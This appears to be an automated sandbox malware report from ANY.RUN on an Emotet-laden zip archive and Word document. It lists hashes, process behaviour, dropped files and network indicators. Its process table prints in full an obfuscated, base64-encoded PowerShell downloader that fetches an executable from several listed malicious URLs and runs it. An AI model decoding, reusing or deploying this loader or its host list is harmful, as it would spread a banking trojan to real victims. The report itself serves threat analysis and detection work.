analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DFJ9L5D-20200919.zip

Full analysis: https://app.any.run/tasks/b25d3677-597c-45cb-b6f5-4c51b33cd2ce
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 30, 2020, 06:30:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
Indicators:
MIME: application/zip
File info: Zip archive data, at least v5.1 to extract
MD5:

B5506F51AA296C6680F2E1F7988AFAB0

SHA1:

0742C0710B145D519B97A4E157EF67414644A1BB

SHA256:

56F3CECF24F947A6300E3F3ED3A1AE3200CF0EFDD0F7B1AA4B300DC0724F9674

SSDEEP:

1536:YztpYNZggoE/hqs1QJ4KzIF25EWPV2eLXs4f/cScF3HWcg791N4JhHUVAP3:YzHUX/1QKKzS25VPXH/ct9W7OEVg3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • WinRAR.exe (PID: 3900)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 3900)
    • PowerShell script executed

      • powershell.exe (PID: 3792)
    • Executed via WMI

      • powershell.exe (PID: 3792)
    • Creates files in the user directory

      • powershell.exe (PID: 3792)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 604)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 604)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3792)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: DFJ9L5D-20200919.doc
ZipUncompressedSize: 243226
ZipCompressedSize: 114280
ZipCRC: 0x0bfe74be
ZipModifyDate: 2020:09:19 09:43:01
ZipCompression: Unknown (99)
ZipBitFlag: 0x0003
ZipRequiredVersion: 51
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
3
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3900"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\DFJ9L5D-20200919.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
604"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb3900.29862\DFJ9L5D-20200919.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3792powershell -en JABGAGYAegByADQANwBmAD0AKAAnAEgAJwArACgAJwAzAGQAeQByACcAKwAnAGkAcgAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAEUAUgBwAFIAbwBGAGkAbABFAFwAUgA0AGUANABTAHAAcQBcAEIANgBRADQAaABRAF8AXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIAZQBDAHQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAEMAdQBSAEkAYABUAHkAUABgAFIAbwB0AE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzACcAKQArACgAJwAxACcAKwAnADIALAAnACkAKwAoACcAIAAnACsAJwB0AGwAJwApACsAKAAnAHMAMQAxACwAJwArACcAIAAnACsAJwB0AGwAcwAnACkAKQA7ACQASgAwAHcAeAA5AG0ANAAgAD0AIAAoACgAJwBHACcAKwAnAHEAXwBlACcAKQArACcAbgAnACsAKAAnAHgAaQAnACsAJwAzAGcAJwApACkAOwAkAEYAaQBkAHIAagA4AF8APQAoACcASwAnACsAKAAnADMAeQAnACsAJwBsACcAKQArACgAJwBzACcAKwAnADQAeAAnACkAKQA7ACQARQB3ADMAawBjAHUAagA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ACcAKwAnADAAJwArACcAfQBSADQAZQA0AHMAJwArACcAcABxAHsAMAB9AEIAJwArACgAJwA2AHEANABoACcAKwAnAHEAJwApACsAJwBfACcAKwAnAHsAMAB9ACcAKQAtAEYAIABbAEMAaABBAHIAXQA5ADIAKQArACQASgAwAHcAeAA5AG0ANAArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAE4AMgBtADMAeQA1AG4APQAoACgAJwBPADMAJwArACcAcQAnACkAKwAnADYAJwArACgAJwBoACcAKwAnAHYAOQAnACkAKQA7ACQAQgB5ADcANwBkAHYAZgA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBlAHQALgBXAEUAYgBDAEwAaQBlAG4AVAA7ACQATQB0AGkAcQB3AGQANwA9ACgAKAAnAGgAdAB0AHAAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAHkAJwApACsAJwBkACcAKwAnAHMAbAAnACsAKAAnAGkAbgAuAGYAJwArACcAdQBuAC8AJwArACcAdwAnACsAJwBwACcAKQArACgAJwAtAGkAJwArACcAbgAnACsAJwBjAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAEoAMgBnAHQAJwArACcAUAA3AHIAdgAnACsAJwBCAEEALwAqAGgAdAB0ACcAKwAnAHAAOgAvACcAKQArACgAJwAvAGcAJwArACcAYQBiAG8AJwApACsAKAAnAHgALgBlAHUALwAwADAAJwArACcAMQBfAGUAbAAnACsAJwBlAG0AZQBpACcAKwAnAC8AJwArACcAbQAnACsAJwBnADkAJwArACcALwAqAGgAJwArACcAdAB0AHAAJwApACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG8AJwArACcAbgAnACkAKwAoACcAZQBpAG4AJwArACcAcwBpACcAKQArACgAJwB4AC4AJwArACcAYwBvAG0AJwApACsAKAAnAC8AdAAnACsAJwBlAHMAJwApACsAKAAnAHQALwAnACsAJwBmACcAKQArACcAUAAnACsAKAAnAEYAMgB6ACcAKwAnAEIAJwArACcAVQBJAC8AKgAnACkAKwAnAGgAJwArACgAJwB0AHQAcAAnACsAJwA6AC8AJwApACsAKAAnAC8AJwArACcAdgBpACcAKwAnAHAALgBqAGkAegAnACsAJwBoACcAKQArACgAJwBpACcAKwAnAGcAdQBvAHIAJwArACcAZQAnACkAKwAoACcAbgAnACsAJwAuAGMAbwBtAC8AJwArACcAbQAnACkAKwAoACcAegAnACsAJwB4AGYAMwAvADcAbAAnACkAKwAnADYAJwArACcAdwAnACsAJwA2AHQAJwArACgAJwAvACcAKwAnACoAJwArACcAaAB0AHQAcAAnACkAKwAoACcAcwAnACsAJwA6AC8AJwApACsAKAAnAC8AJwArACcAdwB3AHcAJwApACsAKAAnAC4AJwArACcAeQBlAHUAbQAnACkAKwAoACcAbwBpAHQAcgAnACsAJwB1ACcAKQArACgAJwBvAG4AZwAuAHYAJwArACcAbgAnACkAKwAoACcALwBpAG4AJwArACcAcwB0ACcAKwAnAGEAJwApACsAKAAnAGwAJwArACcAbAAvACcAKQArACgAJwBUAEIAJwArACcATgAvACcAKQArACgAJwAqAGgAJwArACcAdAAnACkAKwAoACcAdAAnACsAJwBwADoALwAnACkAKwAoACcALwB3ACcAKwAnAHcAJwApACsAKAAnAHcALgAnACsAJwBnACcAKQArACgAJwByAGUAJwArACcAYQAnACsAJwB1AGQAcwB0AHUAJwApACsAKAAnAGQAaQBvAC4AYwBvACcAKwAnAG0AJwApACsAJwAvAGQAJwArACgAJwBvACcAKwAnAGMAcwAnACkAKwAoACcALwA1ACcAKwAnAGYAJwApACsAKAAnAFQASwAnACsAJwBWACcAKQArACgAJwBUAC8AKgAnACsAJwBoAHQAdAAnACkAKwAnAHAAcwAnACsAJwA6AC8AJwArACcALwAnACsAKAAnAHcAJwArACcAdwB3ACcAKQArACgAJwAuAGkAcwAnACsAJwBhAHQAJwApACsAKAAnAGUAYwAnACsAJwBoACcAKQArACgAJwBuAG8AbAAnACsAJwBvAGcAeQAnACkAKwAoACcALgBjACcAKwAnAG8AbQAvACcAKQArACgAJwBjAHcAYQB0AGMAJwArACcAaAAvACcAKwAnAHgAJwApACsAKAAnAHcAJwArACcAVgBKACcAKQArACgAJwBmACcAKwAnAE4AdQBoAC8AJwApACkALgAiAFMAYABwAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASQBnAHkAOQA1ADUAdAA9ACgAJwBSACcAKwAoACcAcQA1AHoAaQAnACsAJwA4ACcAKQArACcAMAAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABGAGIAMQB5ADgAcgBxACAAaQBuACAAJABNAHQAaQBxAHcAZAA3ACkAewB0AHIAeQB7ACQAQgB5ADcANwBkAHYAZgAuACIAZABPAFcAbgBgAGwATwBgAEEARABmAGkAbABFACIAKAAkAEYAYgAxAHkAOAByAHEALAAgACQARQB3ADMAawBjAHUAagApADsAJABNAGcAZQBzAHEAbwAwAD0AKAAoACcAVgB0ADgAcgAnACsAJwByACcAKQArACcAZQA1ACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABFAHcAMwBrAGMAdQBqACkALgAiAEwAZQBOAGAAZwBUAEgAIgAgAC0AZwBlACAAMwA2ADUANQA5ACkAIAB7AC4AKAAnAEkAbgAnACsAJwB2ACcAKwAnAG8AawBlAC0ASQB0AGUAbQAnACkAKAAkAEUAdwAzAGsAYwB1AGoAKQA7ACQAUwBhAG0AZgB6AG0AMQA9ACgAKAAnAEQAZABpACcAKwAnAGEAJwApACsAJwB6ACcAKwAnAG4AeAAnACkAOwBiAHIAZQBhAGsAOwAkAEcAbQBhAHIAcQBzADgAPQAoACgAJwBHACcAKwAnAGQAbAAnACkAKwAnADgAJwArACgAJwBiADEAJwArACcAdQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgA1AHMAOAB3AGMANAA9ACgAKAAnAEsAawAnACsAJwBsAGwAMQAnACkAKwAnAG4AZgAnACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 429
Read events
1 605
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
604WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRCBFB.tmp.cvr
MD5:
SHA256:
3792powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7LA33G1NIIPPRKT15KQB.temp
MD5:
SHA256:
604WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:2E972F47A1ABD1450B7BD324E4B4051D
SHA256:904660F27EF26AE5A3818071EF7E5DF83E97616E8023BFEFA465F594FF4B9A57
3792powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
604WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIb3900.29862\~$J9L5D-20200919.docpgc
MD5:358427160D4BC80394F75F418D9AD73B
SHA256:EC97F8942F15A6883027BAC43EEA0273FE1F40C0679027EEB08837B0D8F6AC67
3792powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bd707.TMPbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
604WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B07614BD859564699B35C4545389C3AB
SHA256:6986C355221867DD4B9EBA3D4967DBC25FD8E728B79961FF628E1D6B25B90599
3900WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb3900.29862\DFJ9L5D-20200919.docdocument
MD5:D40C2A3E701423B9B3A40E8D94C46F4A
SHA256:84F2933DE3FF60B0D0027960358480B241B27C95B95016B64E9A12066665D623
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
7
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3792
powershell.exe
GET
404
46.183.8.124:80
http://oneinsix.com/test/fPF2zBUI/
GB
html
290 b
suspicious
3792
powershell.exe
GET
404
129.28.198.7:80
http://ydslin.fun/wp-includes/J2gtP7rvBA/
CN
html
189 b
suspicious
3792
powershell.exe
GET
404
49.233.19.126:80
http://vip.jizhiguoren.com/mzxf3/7l6w6t/
CN
html
265 b
suspicious
3792
powershell.exe
GET
404
79.172.249.103:80
http://gabox.eu/001_elemei/mg9/
HU
html
1.76 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3792
powershell.exe
46.183.8.124:80
oneinsix.com
34SP.com Limited
GB
suspicious
129.28.198.7:80
ydslin.fun
CN
suspicious
3792
powershell.exe
79.172.249.103:80
gabox.eu
Deninet KFT
HU
unknown
3792
powershell.exe
103.255.237.15:443
www.yeumoitruong.vn
VNPT Corp
VN
unknown
3792
powershell.exe
104.27.148.14:80
www.greaudstudio.com
Cloudflare Inc
US
shared
3792
powershell.exe
49.233.19.126:80
vip.jizhiguoren.com
CN
suspicious
3792
powershell.exe
104.27.149.14:80
www.greaudstudio.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
ydslin.fun
  • 129.28.198.7
suspicious
gabox.eu
  • 79.172.249.103
unknown
oneinsix.com
  • 46.183.8.124
suspicious
vip.jizhiguoren.com
  • 49.233.19.126
suspicious
www.yeumoitruong.vn
  • 103.255.237.15
unknown
www.greaudstudio.com
  • 104.27.149.14
  • 104.27.148.14
  • 172.67.220.99
suspicious

Threats

No threats detected
No debug info